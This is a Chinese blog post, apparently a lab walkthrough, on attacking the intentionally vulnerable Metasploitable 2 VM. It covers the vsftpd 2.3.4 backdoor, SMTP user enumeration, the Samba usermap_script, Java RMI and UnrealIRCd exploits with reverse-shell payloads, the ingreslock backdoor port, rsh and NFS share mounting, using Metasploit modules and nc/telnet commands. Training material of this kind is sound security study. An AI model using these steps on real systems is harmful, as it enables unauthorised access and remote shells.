Metasploitable部分渗透

已于 2023-02-23 20:47:19 修改
阅读量449 收藏 2
点赞数 3
文章标签: 服务器 linux 网络 网络安全 Powered by 金山文档
于 2023-02-23 20:43:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62933250/article/details/129188504
版权

靶机:https://pan.baidu.com/s/10VnGGir_tV0Aewv_xdjc8w 提取码:3gm0

用户名:msfadmin

密码:msfadmin

端口号

漏洞

21

笑脸漏洞

25

用户名枚举

139,445

SMB

512,513,514

RSH系列

1099

java反序列化

1524

后门端口

2049

nsf文件共享

6667

IRC

VSFTP2.3.4

nmap扫描发现ftp版本为2.3.4,笑脸漏洞

方法一:

ftp登陆后连6200端口

还未进行ftp登陆时,6200端口是关闭的

现在进行ftp登录,在用户名后面加一个:)即可,密码任意

登陆后,再开启一个终端窗口,扫描6200端口是否开启

此时的6200端口已经开启,nc直接连接就行

方法二:

msfconsole

搜索vsftp,并使用此模块

exploit/unix/ftp/vsftpd_234_backdoor

配置相关参数

set rhost 目标IP

直接run

smtp用户名列举

进行用户列举前需要了解一点smtp

命令:

VRFY                    #验证指定用户是否存在,因安全原因常被禁止
MAIL FROM               # 命令中指定的地址是发件人地址
RCPT TO                 # 标识单个的邮件接收人;可有多个 RCPT TO;常在 MAIL 命令后面

状态码:

250        #操作完成
550        #未完成

方法一:

手动使用VRFY,MAIL FROM,RCPT TO命令来进行用户名枚举

VRFY:

MAIL FROM+RCPT TO相结合使用:

方法二:

使用工具smtp-user-enum

安装工具:sudo apt-get install smtp-user-enum 

相关选项

-m <number>   最大线程数(默认: 5)
-M <mode>  使用方法方式 EXPN, VRFY or RCPT (默认: VRFY)
-u <user>   指定用户
-f <addr>   邮箱地址,只能用在 "RCPT TO" mode (默认: user@example.com)
-D <domaim>   使用电子邮件地址添加到用户列表在域 (默认: none)使用邮箱代替用户名
-U <file>   通过smtp服务指定文件里的用户名检查
-t <host>   指定主机来运行smtp服务器主机服务
-T <file>   指定文件来运行smtp服务器主机服务
-p <port>   设置TCP端口号 (默认: 25)
-d   调试
-w   最大返回时间 (default: 5)
-v   版本
-h   帮助

方法三:

msfconsole

auxiliary/scanner/smtp/smtp_enum模块

set rhost 目标ip

配置好相关参数后run

等待爆破后获取用户名

SMB

SMB是用于windows,linux上的共享文件和打印机的通信协议

通过nmpa扫描我们发现,正在运行的SMB版本是3.x-4.x

可以使用

exploit/multi/samba/usermap_script模块进行渗透攻击

配置payload

这里使用linux的基础反向攻击即可

show payloads
set payload cmd/unix/reverse

配置相关配置

set rhost 目标ip
set lhost 攻击机ip

直接run即可

445端口也可

RLOGIN/RSH

rsh系列:在系统之后被错误配置从而允许远程访问者从任何地方访问

nmap扫描出512,513,514端口

使用这三个端口需要使用到rsh客户端

apt-get install rsh-client

rlogin

rsh

java RMI

Java RMI:Java远程方法调用,它是一种机制,允许一个Java虚拟机中的对象去访问和调用另一个Java虚拟机中包含的方法

nmap扫描出来1099端口

可以先使用msf中的扫描模块,扫描一下是否存在漏洞

auxiliary/scanner/misc/java_rmi_server

扫描结果表示,该靶机存在java_rmi漏洞

确定其存在漏洞后,使用攻击模块

exploit/multi/misc/java_rmi_server

配置相关参数

set rhost 目标ip
set lhost 攻击机ip

成功拿到shell

Ingreslock1524端口后门漏洞

nmap扫描到1524端口

判断其是一个后门端口

telnet登录即可

telnet 目标ip 1524

nfs文件共享

NFS是基于UDP/IP协议的应用,其实现主要是采用远程过程调用RPC机制,RPC提供了一组与机器、操作系统以及低层传送协议无关的存取远程文件的操作。

nmap扫描到2049端口,是nfs服务

使用nfs服务获取靶机的共享文件

获取到共享文件

新创建一个文件夹为tmp1,并将获取到的文件挂载到tmp1中

进入到tmp1中即可查看挂载的文件,不仅可以查看挂载的文件,同时还可以向里面写入文件

IRC漏洞

IRC:当pc上使用irc的客户端连接到服务端上,即可实现实时聊天

nmap扫描到6667端口

msf中使用exploit/unix/irc/unreal_ircd_3281_backdoor模块

设置payload为linux的反向链接

set payload cmd/unix/reverse

配置目标对象和监听对象

set rhost 目标ip
set lhost 攻击机ip

设置好了直接run

明朝冰红茶
关注
Metasploit渗透测试框架
qq_44237206的博客
05-16 534
Metasploit简介 Metasploit是一个渗透测试平台,使您能够查找,利用和验证漏洞。该平台包括Metasploit框架及其商业对手,如Metasploit Pro。 Metasploit是一个免费的、可下载的框架,通过它可以很容易对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补..
网络安全kali渗透学习 web渗透入门 Metasploit渗透测试框架介绍-Metasploitable2-Linux 靶机系统介绍
xueshenlaila的博客
02-28 2210
Metasploit是一个免费的、可下载的框架,通过它可以很容易对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。
渗透Metasploitable主机
sGanYu
09-06 2801
攻击机:kali 靶机:Metasploitable2(一个特制的ubuntu操作系统,设计初衷作为安全工具测试和演示常见漏洞攻击的环境,默认开放高危端口如21、22、23、445、6000等等,而且具有很多未打补丁的高危漏洞) Metasploitable2漏洞:弱口令漏洞(如vnc、mysql、PostgreSQL等)、Samba MS-RPC Shell命令注入漏洞 、Vsftpd漏洞、Linux NFS共享目录配置漏洞、Tomcat管理台默认口令漏洞、root用户弱口令漏洞(SSH爆破) .
通过metasploit工具渗透Metasploitable 2靶机
热门推荐
朝歌
04-24 1万+
    首先,是Metasploitable 2的在本地的安装,    下载地址:https://sourceforge.net/projects/metasploitable/?source=typ_redirect。下载过后解压。会有四个文件。            用VM打开.vmsd文件。如果遇见需要配置文件什么的,就用VM打开vmx文件。        就会显示下面:打开虚拟机账号密码都...
针对 Metasploitable 3 的渗透测试
07-31
针对 Metasploitable 3 的渗透测试-漏洞银行大咖面对面5-Demon
Metasploit Framework(MSF)对Metasploitable2的渗透解析
最新发布
黄乔国PHP
05-15 961
Metasploitable2虚拟系统是一个特殊的ubuntu操作系统,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。其中最核心是可以用来作为MSF攻击用的靶机。这样方便我们学习MSF框架的使用。并且开放了很多的高危端口如21、23、445等,而且具有很多未打补丁的高危漏洞, 如Samba MS-RPC Shell命令注入漏洞等,而且对外开放了很多服务,并且数据库允许外联等。系统中的用户口令均为弱口令。系统搭载了相关Web漏洞演练平台,如:TWiki,phpMyAdmin。
Metasploitable渗透测试中的无线网络攻击
## 1.1 Metasploitable渗透测试概述 Metasploitable是一个专门设计用于漏洞测试和渗透测试的虚拟机。它包含了大量容易受攻击的漏洞,旨在帮助安全研究人员和渗透测试人员进行漏洞测试、渗透测试和安全漏洞攻击的...
Metasploitable2-Linux.7z
02-26
Metasploitable2是Metasploit项目的一部分,该项目由 Rapid7 维护,是一个开源的安全框架,主要用于漏洞扫描和渗透测试。这个Linux版本的Metasploitable2包含了多个服务和应用,这些服务和应用都存在已知的安全弱点...
Metasploitable环境下的社交工程渗透测试
Metasploitable是一个旨在供渗透测试人员进行练习和教学的虚拟机。它包含了大量的安全漏洞和弱点,能够帮助安全专家测试和评估自己的技能。Metasploitable模拟了一个典型的Linux服务器,它的漏洞经常被用于进行渗透...
信安网络渗透测试实验一.docx
12-15
本实验包括五个部分:使用搜索引擎搜索指定文件、手机位置定位、编码解码、地址信息查询和 NMAP 使用。 2.1 使用搜索引擎搜索指定文件 使用 Google 或百度搜索麻省理工学院网站中文件名包含“networksecurity”的 ...
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
渗透测试实例:Metasploitable3靶机
lxy123_com的博客
02-09 4060
实验环境:Kali虚拟机一台、4G运行,Metasploitable3靶机一台,IP地址192.168.22.20 实验目的:对Metasploitable3靶机进行渗透测试 实验步骤: (一),对靶机进行扫描 1,使用Neuss对靶机进行扫描
渗透测试学习系列之《Metasploitable介绍》(一)
DAkoll的博客
11-03 3031
Metasploitable是什么 ? Metasploitable 是一个刻意制作出来包含漏洞的Linux虚拟机系统。它可以用来做安全训练,测试安全工具和练习渗透测试技术。系统的默认账户 账号:msfadmin 密码:msfadmin 为官方建议你不要把这个易被攻击的虚拟机暴露在公共网络上(请使用NAT或者Host-only模式)有系统方面的问题可以联系系统的搭建者:msfdev@met
Metasploitable渗透测试实战:ms10-046
m0_60121089的博客
05-06 1487
1.漏洞描述 这是Windows Shell中一个公开披露的漏洞。如果显示特制快捷方式的图标,则该漏洞可能允许远程执行代码。成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。与使用管理用户权限进行操作的用户相比,将其帐户配置为在系统上具有较少用户权限的用户受到的影响较小。 2.实战工具 软件:VMware Workstation 14 攻击机:kali(ip:192.168.240.143) 靶机:win7(ip:192.168.240.157) 3.漏洞利用 1.用ping命.
通过Metasploitable2了解渗透测试基本思路
烛时雨
04-10 2874
0×00前言/什么是Metasploitable2: Metasploitable是一个刻意制造的Linux靶机。此系统可应用于渗透测试,测试安全工具以及实践常见的渗透测试技术。Metasploitable2比上一个版本包含更多可用漏洞,这个虚拟系统兼容VMware,VirtualBox和其他虚拟平台。 安装方法在此不做过多讲述本篇主要对metasploitable2进行渗透测试 ...
手把手教你kali渗透Metasploitable
qq_41620273的博客
12-24 1万+
记一次kali渗透Metasploitbale靶机 1.网络设置 2.ifconfig查看Metasploitable的IP: 3.对Metasploitbale进行nmap端口扫描: Nmap 192.168.22.128 端口爆破:FTP、SSH等 工具:Hydra 备用字典:user.txt: pass,txt: 一、 爆破FTP hydra -L /root/桌面/user.txt -P /root/桌面/pass.txt [ftp://192.168.22.128](ftp://19
网络攻击与防御》 Linux攻击实验(4)
CSDNfengwang的博客
02-21 642
理解Linux操作系统的安全体系结构与机制,掌握Linux远程安全攻防技术,掌握Linux操作系统网络服务漏洞攻击过程,并学习如何利用metasploitLinux操作系统进行简单的攻击及提权。远程获取Metasploitable2-Linux的shadow文件和passwd文件内容;使用generic/shell_reverse_tcp的PAYLOAD来连接远程主机;远程获取Metasploitable2-Linux的root帐户权限;/etc/shadow:储存了系统中的各个用户的密码信息。
【kali-信息收集】(1.2)SNMP枚举:Snmpwalk、Snmpcheck;SMTP枚举:smtp-user-enum
08-01 1532
【kali-信息收集】SNMP枚举、SMTP枚举
常用端口
ppby2002的专栏
02-06 2681
端口号码 / 层 名称 注释 1 tcpmux TCP 端口服务多路复用 5 rje 远程作业入口 7 echo Echo 服务 9 discard 用于连接测试的空服务 11 systat 用于列举连接了的端口的系统状态 13 daytime 给请求主机发送日期和时间 17 qotd 给
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值